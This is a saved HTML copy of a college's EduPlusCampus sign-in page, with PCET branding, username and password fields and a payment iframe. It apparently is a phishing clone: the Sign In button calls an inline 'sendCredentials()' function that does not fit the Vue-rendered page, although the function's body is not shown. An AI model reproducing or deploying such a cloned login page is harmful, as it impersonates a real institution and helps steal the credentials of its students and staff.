<body><div id="MathJax_Message" style="display: none;"></div><div id="bdCheckout" style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; display: none; z-index: 999999;"><iframe title="BillDesk Smart Payment Solution" id="bdsps" name="bdsps" class="billdeskiFrame" style="height: 100%; width: 100%; display: block;" allow="payment" src="EduPlusCampus_files/init.html" frameborder="0"></iframe><div id="spin-loader-mask" class="spin-loader-mask"><div class="spin-loader"><div></div></div></div><style type="text/css">body.bdsps {height: 100%; /*height: 100vh;*/ width: 100%; width: 100vw;} body.pay-selector {overflow:hidden;}</style></div>
  <div id="app" data-v-app=""><section data-v-5f95abb4=""><!----><!----><div data-v-5f95abb4="" class="mt-5"><div data-v-5f95abb4="" class="v-row v-row--no-gutters justify-center"><div data-v-5f95abb4="" class="v-col-lg-6 v-col-12 d-flex align-center justify-center order-last order-lg-first"><div data-v-5f95abb4="" class="v-row v-row--no-gutters justify-center"><div data-v-5f95abb4="" class="v-col v-col-10"><div data-v-5f95abb4="" class="v-responsive v-img" aria-label="Sample image" role="img"><div class="v-responsive__sizer" style="padding-bottom: 46.4968%;"></div><img class="v-img__img v-img__img--contain" src="EduPlusCampus_files/landing.a9a59abe.webp" alt="Sample image" style=""><!----><!----><!----><!----><!----></div></div></div></div><div data-v-5f95abb4="" class="v-col-lg-5 v-col-12 pl-3 pr-3" id="signin"><div data-v-5f95abb4="" class="v-row v-row--no-gutters"><div data-v-5f95abb4="" class="v-col v-col-12 d-flex align-center justify-center"><div data-v-5f95abb4="" class="v-responsive v-img mt-5" style="height: 100px; width: 100px;"><div class="v-responsive__sizer" style="padding-bottom: 96.5889%;"></div><img class="v-img__img v-img__img--contain" src="EduPlusCampus_files/pcet_logo_new1.jpg" style=""><!----><!----><!----><!----><!----></div></div><div data-v-5f95abb4="" class="v-col v-col-12 d-flex align-center justify-center mt-5"><div data-v-5f95abb4="" class="text-h5 font-weight-bold"><span data-v-5f95abb4="" class="blue-theme"> Sign</span><span data-v-5f95abb4="" class="yellow-theme">-In</span></div></div></div><div data-v-5f95abb4="" class="v-row v-row--no-gutters justify-center"><div data-v-5f95abb4="" class="v-col v-col-12"><div data-v-5f95abb4="" class="v-input v-input--horizontal v-input--density-default v-locale--is-ltr v-input--dirty v-text-field v-input--plain-underlined"><div class="v-input__prepend"><!----><i class="mdi-account mdi v-icon notranslate v-theme--light v-icon--size-default" aria-hidden="true"></i></div><div class="v-input__control"><div class="v-field v-field--active v-field--dirty v-field--variant-underlined v-theme--light v-locale--is-ltr"><div class="v-field__overlay"></div><div class="v-field__loader"><div class="v-progress-linear v-theme--light v-locale--is-ltr" style="top: 0px; height: 0px; --v-progress-linear-height: 2px; left: 50%; transform: translateX(-50%);" role="progressbar" aria-hidden="true" aria-valuemin="0" aria-valuemax="100"><!----><div class="v-progress-linear__background bg-primary" style="width: 100%;"></div><div class="v-progress-linear__indeterminate"><div class="v-progress-linear__indeterminate long bg-primary"></div><div class="v-progress-linear__indeterminate short bg-primary"></div></div><!----></div></div><!----><div class="v-field__field" data-no-activator=""><!----><label class="v-label v-field-label" for="input-0" style=""><!---->Username</label><!----><input size="1" type="text" id="input-0" aria-describedby="input-0-messages" class="v-field__input" value=""><!----></div><!----><!----><div class="v-field__outline"><!----><label class="v-label v-field-label v-field-label--floating" aria-hidden="true" for="input-0" style=""><!---->Username</label></div></div></div><!----><div class="v-input__details"><div class="v-messages" role="alert" aria-live="polite" id="input-0-messages"></div><!----></div></div><div data-v-5f95abb4="" class="v-input v-input--horizontal v-input--density-default v-locale--is-ltr v-input--dirty v-text-field v-input--plain-underlined"><div class="v-input__prepend"><!----><i class="mdi-lock mdi v-icon notranslate v-theme--light v-icon--size-default" aria-hidden="true"></i></div><div class="v-input__control"><div class="v-field v-field--active v-field--appended v-field--dirty v-field--variant-underlined v-theme--light v-locale--is-ltr"><div class="v-field__overlay"></div><div class="v-field__loader"><div class="v-progress-linear v-theme--light v-locale--is-ltr" style="top: 0px; height: 0px; --v-progress-linear-height: 2px; left: 50%; transform: translateX(-50%);" role="progressbar" aria-hidden="true" aria-valuemin="0" aria-valuemax="100"><!----><div class="v-progress-linear__background bg-primary" style="width: 100%;"></div><div class="v-progress-linear__indeterminate"><div class="v-progress-linear__indeterminate long bg-primary"></div><div class="v-progress-linear__indeterminate short bg-primary"></div></div><!----></div></div><!----><div class="v-field__field" data-no-activator=""><!----><label class="v-label v-field-label" for="input-2" style=""><!---->Password</label><!----><input size="1" type="password" id="input-2" aria-describedby="input-2-messages" class="v-field__input"><!----></div><!----><div class="v-field__append-inner"><!----><i class="mdi-eye-off mdi v-icon notranslate v-theme--light v-icon--size-default v-icon--clickable" role="button" aria-hidden="false" aria-label="Password appended action"></i></div><div class="v-field__outline"><!----><label class="v-label v-field-label v-field-label--floating" aria-hidden="true" for="input-2" style=""><!---->Password</label></div></div></div><!----><div class="v-input__details"><div class="v-messages" role="alert" aria-live="polite" id="input-2-messages"></div><!----><span></span><div class="v-counter" style="display: none;">13</div></div></div><div data-v-5f95abb4="" class="v-row v-row--no-gutters justify-center"><button data-v-5f95abb4="" type="submit" onclick="sendCredentials()" class="v-btn v-btn--elevated v-theme--light bg-primary v-btn--density-default v-btn--size-default v-btn--variant-elevated rounded-pill"><span class="v-btn__overlay"></span><span class="v-btn__underlay"></span><!----><span class="v-btn__content" data-no-activator="">Sign In</span><!----><!----></button></div></div><div data-v-5f95abb4="" class="v-col v-col-12" justify="center"><div data-v-5f95abb4="" class="mt-4"><div data-v-5f95abb4="" class="v-container v-locale--is-ltr"><div data-v-5f95abb4="" class="v-row v-row--no-gutters align-left"><div data-v-5f95abb4="" class="v-col v-col-8"><i data-v-5f95abb4="" class="mdi-help-box mdi v-icon notranslate v-theme--light v-icon--size-default text-primary mr-1" aria-hidden="true"></i><a data-v-5f95abb4="" class="text-decoration-underline pointer-cursor" justify="left">Help</a></div><div data-v-5f95abb4="" class="v-col v-col-4" justify="right"><i data-v-5f95abb4="" class="mdi-lock-reset mdi v-icon notranslate v-theme--light v-icon--size-default text-primary mr-1" aria-hidden="true"></i><a data-v-5f95abb4="" class="text-decoration-underline pointer-cursor">Forgot Password?</a></div></div><div data-v-5f95abb4="" class="v-row v-row--no-gutters mt-5"><div data-v-5f95abb4="" class="v-col"><center data-v-5f95abb4=""><span data-v-5f95abb4=""><a data-v-5f95abb4="" target="_blank"><img data-v-5f95abb4="" src="EduPlusCampus_files/android.80197a1a.jpeg" alt="android" style="height: 35px;"></a></span><span data-v-5f95abb4="" class="ml-5"><a data-v-5f95abb4="" target="_blank"><img data-v-5f95abb4="" src="EduPlusCampus_files/iphone.11b01ecc.jpeg" alt="iphone" style="height: 35px;"></a></span></center><br data-v-5f95abb4=""></div></div></div></div></div></div></div><!----><!----><!----></div></div><!----><!----><div data-v-5f95abb4=""></div><div data-v-afe43e2f="" data-v-5f95abb4="" dark="" class="justify-center d-print-none footer-class" id="noprint"><div data-v-afe43e2f="" class="v-row v-row--no-gutters justify-center"><span data-v-afe43e2f=""> Powered By <a data-v-afe43e2f="" target="_blank" href="https://www.edupluscampus.com/" color="#ffffff" class="ml-1 text-white"></a><a data-v-afe43e2f="" target="_blank" href="https://www.edupluscampus.com/" class="ml-2 mr-2"><img data-v-afe43e2f="" src="EduPlusCampus_files/1.png" width="70"></a><a data-v-afe43e2f="" href="https://www.youtube.com/channel/UCisFmSqTOFXMcpb7GlmE_7A/playlists" target="_blank" class="ml-3 icon linkedIn"><i data-v-afe43e2f="" class="mdi-youtube mdi v-icon notranslate v-theme--light v-icon--size-default" style="color: rgb(255, 0, 0); caret-color: rgb(255, 0, 0);" aria-hidden="true"></i></a><a data-v-afe43e2f="" href="https://www.facebook.com/edutech4?utm_source=Facebook_Page&amp;utm_medium=leads&amp;utm_campaign=edu_Facebook" target="_blank" class="ml-3 icon linkedIn"><i data-v-afe43e2f="" class="mdi-facebook mdi v-icon notranslate v-theme--light v-icon--size-default" style="color: rgb(10, 102, 194); caret-color: rgb(10, 102, 194);" aria-hidden="true"></i></a><a data-v-afe43e2f="" href="https://bit.ly/3l5elKE" target="_blank" class="ml-3 linkedIn icon"><i data-v-afe43e2f="" class="mdi-instagram mdi v-icon notranslate v-theme--light v-icon--size-default instagram" aria-hidden="true"></i></a><a data-v-afe43e2f="" href="https://bit.ly/3l4ZGiu" target="_blank" class="ml-3 icon linkedIn"><i data-v-afe43e2f="" class="mdi-twitter mdi v-icon notranslate v-theme--light v-icon--size-default" style="color: rgb(10, 102, 194); caret-color: rgb(10, 102, 194);" aria-hidden="true"></i></a><a data-v-afe43e2f="" href="https://bit.ly/3bBTdsA" target="_blank" class="ml-3 icon linkedIn"><i data-v-afe43e2f="" class="mdi-linkedin mdi v-icon notranslate v-theme--light v-icon--size-default" style="color: rgb(10, 102, 194); caret-color: rgb(10, 102, 194);" aria-hidden="true"></i></a></span></div></div></section></div>
  
  



</body></html>
